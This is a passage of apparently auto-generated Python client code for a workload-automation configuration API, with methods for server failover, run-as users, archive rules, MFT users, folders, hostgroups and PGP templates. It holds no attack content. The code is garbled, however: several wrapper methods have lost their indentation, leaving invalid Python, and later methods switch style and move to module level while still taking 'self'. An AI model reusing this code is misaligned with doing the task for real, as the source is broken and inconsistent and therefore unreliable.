        # Substitution for the {name} URL placeholder.
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The new parameter value travels as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/em/param/{name}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def setasprimary(self, server, **kwargs): # noqa: E501
"""Set secondary server as Primary on a specified Server # noqa: E501
Set secondary server as Primary on a specified Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.setasprimary(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.setasprimary_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.setasprimary_with_http_info(server, **kwargs) # noqa: E501
return data
    def setasprimary_with_http_info(self, server, **kwargs):  # noqa: E501
        """Set secondary server as Primary on a specified Server  # noqa: E501

        Set secondary server as Primary on a specified Server  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.setasprimary_with_http_info(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the path param plus the generic
        # transport-control kwargs appended below.
        all_params = ['server']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method setasprimary" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `setasprimary`")  # noqa: E501

        collection_formats = {}

        # Substitution for the {server} URL placeholder.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # PUT request with no body; the target server is in the path.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/setasprimary', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def test_run_as_user(self, server, agent, user, **kwargs): # noqa: E501
"""Test existed Run-as user # noqa: E501
Test existing Run-as user in server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.test_run_as_user(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:param RunAsUserDetailsData body: Run as user details data
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.test_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
else:
(data) = self.test_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
return data
    def test_run_as_user_with_http_info(self, server, agent, user, **kwargs):  # noqa: E501
        """Test existed Run-as user  # noqa: E501

        Test existing Run-as user in server.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.test_run_as_user_with_http_info(server, agent, user, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent (required)
        :param str user: The user name (required)
        :param RunAsUserDetailsData body: Run as user details data
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the three path params, the optional request
        # body, and the generic transport-control kwargs appended below.
        all_params = ['server', 'agent', 'user', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method test_run_as_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `test_run_as_user`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `test_run_as_user`")  # noqa: E501
        # verify the required parameter 'user' is set
        if ('user' not in params or
                params['user'] is None):
            raise ValueError("Missing the required parameter `user` when calling `test_run_as_user`")  # noqa: E501

        collection_formats = {}

        # Substitutions for the {server}/{agent}/{user} URL placeholders.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'user' in params:
            path_params['user'] = params['user']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # Optional Run-as-user details travel as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/runasuser/{agent}/{user}/test', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_archive_rule(self, body, rule_name, **kwargs): # noqa: E501
"""Edit Workload Archiving rule # noqa: E501
Edit Workload Archiving rule details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_archive_rule(body, rule_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ArchiveRule body: Edit Workload Archiving rule details (required)
:param str rule_name: Rule name to update (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_archive_rule_with_http_info(body, rule_name, **kwargs) # noqa: E501
else:
(data) = self.update_archive_rule_with_http_info(body, rule_name, **kwargs) # noqa: E501
return data
    def update_archive_rule_with_http_info(self, body, rule_name, **kwargs):  # noqa: E501
        """Edit Workload Archiving rule  # noqa: E501

        Edit Workload Archiving rule details  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_archive_rule_with_http_info(body, rule_name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param ArchiveRule body: Edit Workload Archiving rule details (required)
        :param str rule_name: Rule name to update (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the body and path param, plus the generic
        # transport-control kwargs appended below.
        all_params = ['body', 'rule_name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_archive_rule" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `update_archive_rule`")  # noqa: E501
        # verify the required parameter 'rule_name' is set
        if ('rule_name' not in params or
                params['rule_name'] is None):
            raise ValueError("Missing the required parameter `rule_name` when calling `update_archive_rule`")  # noqa: E501

        collection_formats = {}

        # snake_case 'rule_name' maps to the camelCase {ruleName} placeholder.
        path_params = {}
        if 'rule_name' in params:
            path_params['ruleName'] = params['rule_name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The edited rule definition travels as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/archive/rule/{ruleName}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_external_user(self, body, username, **kwargs): # noqa: E501
"""Update an external user # noqa: E501
Update an external user for b2b # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_external_user(body, username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ExternalUserData body: External user data (required)
:param str username: The external user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_external_user_with_http_info(body, username, **kwargs) # noqa: E501
else:
(data) = self.update_external_user_with_http_info(body, username, **kwargs) # noqa: E501
return data
    def update_external_user_with_http_info(self, body, username, **kwargs):  # noqa: E501
        """Update an external user  # noqa: E501

        Update an external user for b2b  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_external_user_with_http_info(body, username, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param ExternalUserData body: External user data (required)
        :param str username: The external user name (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the body and path param, plus the generic
        # transport-control kwargs appended below.
        all_params = ['body', 'username']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_external_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `update_external_user`")  # noqa: E501
        # verify the required parameter 'username' is set
        if ('username' not in params or
                params['username'] is None):
            raise ValueError("Missing the required parameter `username` when calling `update_external_user`")  # noqa: E501

        collection_formats = {}

        # Substitution for the {username} URL placeholder.
        path_params = {}
        if 'username' in params:
            path_params['username'] = params['username']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The updated external-user record travels as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/mft/externaluser/{username}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_fts_settings(self, body, server, agent, **kwargs): # noqa: E501
"""Update File Transfer Server (FTS) configuration data. # noqa: E501
Update File Transfer Server (FTS) configuration data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_fts_settings(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FtsSettingsData body: File Transfer Server (FTS) configuration data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_fts_settings_with_http_info(body, server, agent, **kwargs) # noqa: E501
else:
(data) = self.update_fts_settings_with_http_info(body, server, agent, **kwargs) # noqa: E501
return data
    def update_fts_settings_with_http_info(self, body, server, agent, **kwargs):  # noqa: E501
        """Update File Transfer Server (FTS) configuration data.  # noqa: E501

        Update File Transfer Server (FTS) configuration data.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_fts_settings_with_http_info(body, server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param FtsSettingsData body: File Transfer Server (FTS) configuration data (required)
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the body and two path params, plus the generic
        # transport-control kwargs appended below.
        all_params = ['body', 'server', 'agent']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_fts_settings" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `update_fts_settings`")  # noqa: E501
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `update_fts_settings`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `update_fts_settings`")  # noqa: E501

        collection_formats = {}

        # Substitutions for the {server}/{agent} URL placeholders.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The FTS configuration travels as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        # NOTE: unlike the sibling endpoints, this one also accepts
        # text/plain responses.
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'text/plain'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/mft/fts/settings', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_hosts_in_hostgroup(self, body, server, hostgroup, **kwargs): # noqa: E501
"""update agents in hostgroup. # noqa: E501
update agents in hostgroup. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_hosts_in_hostgroup(body, server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param HostgroupProperties body: Agent list to update in a hostgroup (required)
:param str server: The Server the agent is connected to. (required)
:param str hostgroup: The hostgroup name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_hosts_in_hostgroup_with_http_info(body, server, hostgroup, **kwargs) # noqa: E501
else:
(data) = self.update_hosts_in_hostgroup_with_http_info(body, server, hostgroup, **kwargs) # noqa: E501
return data
def update_hosts_in_hostgroup_with_http_info(self, body, server, hostgroup, **kwargs):  # noqa: E501
    """Update agents in a hostgroup.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_hosts_in_hostgroup_with_http_info(body, server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param HostgroupProperties body: Agent list to update in a hostgroup (required)
    :param str server: The Server the agent is connected to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('body', 'server', 'hostgroup', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'body': body, 'server': server, 'hostgroup': hostgroup}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_hosts_in_hostgroup" % key
            )
        params[key] = val
    # Every positional parameter is required and must not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_hosts_in_hostgroup`")  # noqa: E501
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `update_hosts_in_hostgroup`")  # noqa: E501
    if params.get('hostgroup') is None:
        raise ValueError("Missing the required parameter `hostgroup` when calling `update_hosts_in_hostgroup`")  # noqa: E501
    # Values substituted into the URL path template.
    path_params = {'server': params['server'],
                   'hostgroup': params['hostgroup']}
    # Negotiated request/response headers.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters and no file uploads.
    return self.api_client.call_api(
        '/config/server/{server}/hostgroup/{hostgroup}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=params['body'],
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_mft_configuration(self, body, server, agent, **kwargs):  # noqa: E501
    """Update MFT Configuration.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_mft_configuration(body, server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param MftConfigurationData body: MFT Configuration Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_mft_configuration_with_http_info(body, server, agent, **kwargs)  # noqa: E501
def update_mft_configuration_with_http_info(self, body, server, agent, **kwargs):  # noqa: E501
    """Update MFT Configuration.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_mft_configuration_with_http_info(body, server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param MftConfigurationData body: MFT Configuration Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('body', 'server', 'agent', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'body': body, 'server': server, 'agent': agent}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_mft_configuration" % key
            )
        params[key] = val
    # Every positional parameter is required and must not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_mft_configuration`")  # noqa: E501
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `update_mft_configuration`")  # noqa: E501
    if params.get('agent') is None:
        raise ValueError("Missing the required parameter `agent` when calling `update_mft_configuration`")  # noqa: E501
    # Values substituted into the URL path template.
    path_params = {'server': params['server'], 'agent': params['agent']}
    # Negotiated request/response headers.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters and no file uploads.
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/configuration', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=params['body'],
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_mft_folder(self, body, folder_name, **kwargs):  # noqa: E501
    """Update an existing virtual folder in MFT.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_mft_folder(body, folder_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param FolderPropertiesData body: virtual folder data (required)
    :param str folder_name: Name of folder (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_mft_folder_with_http_info(body, folder_name, **kwargs)  # noqa: E501
def update_mft_folder_with_http_info(self, body, folder_name, **kwargs):  # noqa: E501
    """Update an existing virtual folder in MFT.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_mft_folder_with_http_info(body, folder_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param FolderPropertiesData body: virtual folder data (required)
    :param str folder_name: Name of folder (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('body', 'folder_name', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'body': body, 'folder_name': folder_name}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_mft_folder" % key
            )
        params[key] = val
    # Both positional parameters are required and must not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_mft_folder`")  # noqa: E501
    if params.get('folder_name') is None:
        raise ValueError("Missing the required parameter `folder_name` when calling `update_mft_folder`")  # noqa: E501
    # The path template uses camelCase for the folder-name placeholder.
    path_params = {'folderName': params['folder_name']}
    # Negotiated request/response headers.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters and no file uploads.
    return self.api_client.call_api(
        '/config/mft/virtualfolder/{folderName}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=params['body'],
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_mft_user_group(self, body, name, **kwargs):  # noqa: E501
    """Update user group.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_mft_user_group(body, name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param UserGroupDetailsData body: User group details (required)
    :param str name: User group name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_mft_user_group_with_http_info(body, name, **kwargs)  # noqa: E501
def update_mft_user_group_with_http_info(self, body, name, **kwargs):  # noqa: E501
    """Update user group.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_mft_user_group_with_http_info(body, name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param UserGroupDetailsData body: User group details (required)
    :param str name: User group name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('body', 'name', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    params = {'body': body, 'name': name}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_mft_user_group" % key
            )
        params[key] = val
    # Both positional parameters are required and must not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_mft_user_group`")  # noqa: E501
    if params.get('name') is None:
        raise ValueError("Missing the required parameter `name` when calling `update_mft_user_group`")  # noqa: E501
    # Value substituted into the URL path template.
    path_params = {'name': params['name']}
    # Negotiated request/response headers.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['*/*']),  # noqa: E501
    }
    # Bearer authentication; no query/form parameters and no file uploads.
    return self.api_client.call_api(
        '/config/mft/usergroup/{name}', 'POST',
        path_params,
        [],  # query params
        header_params,
        body=params['body'],
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_pgp_template(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Update PGP Template.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_pgp_template(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param PgpTemplateData body: PGP Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The PGP Template Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response to just the deserialized data;
    # the delegate handles both the sync and async paths.
    kwargs['_return_http_data_only'] = True
    return self.update_pgp_template_with_http_info(body, server, agent, template_name, **kwargs)  # noqa: E501
def update_pgp_template_with_http_info(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Update PGP Template.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response data.

    >>> thread = api.update_pgp_template_with_http_info(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param PgpTemplateData body: PGP Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The PGP Template Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint understands besides the positionals.
    accepted = ('body', 'server', 'agent', 'template_name', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    params = {'body': body, 'server': server, 'agent': agent,
              'template_name': template_name}
    for key, val in kwargs.items():
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_pgp_template" % key
            )
        params[key] = val
    # Every positional parameter is required and must not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_pgp_template`")  # noqa: E501
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `update_pgp_template`")  # noqa: E501
    if params.get('agent') is None:
        raise ValueError("Missing the required parameter `agent` when calling `update_pgp_template`")  # noqa: E501
    if params.get('template_name') is None:
        raise ValueError("Missing the required parameter `template_name` when calling `update_pgp_template`")  # noqa: E501
    # The path template uses camelCase for the template-name placeholder.
    path_params = {'server': params['server'],
                   'agent': params['agent'],
                   'templateName': params['template_name']}
    # Negotiated request/response headers.
    header_params = {
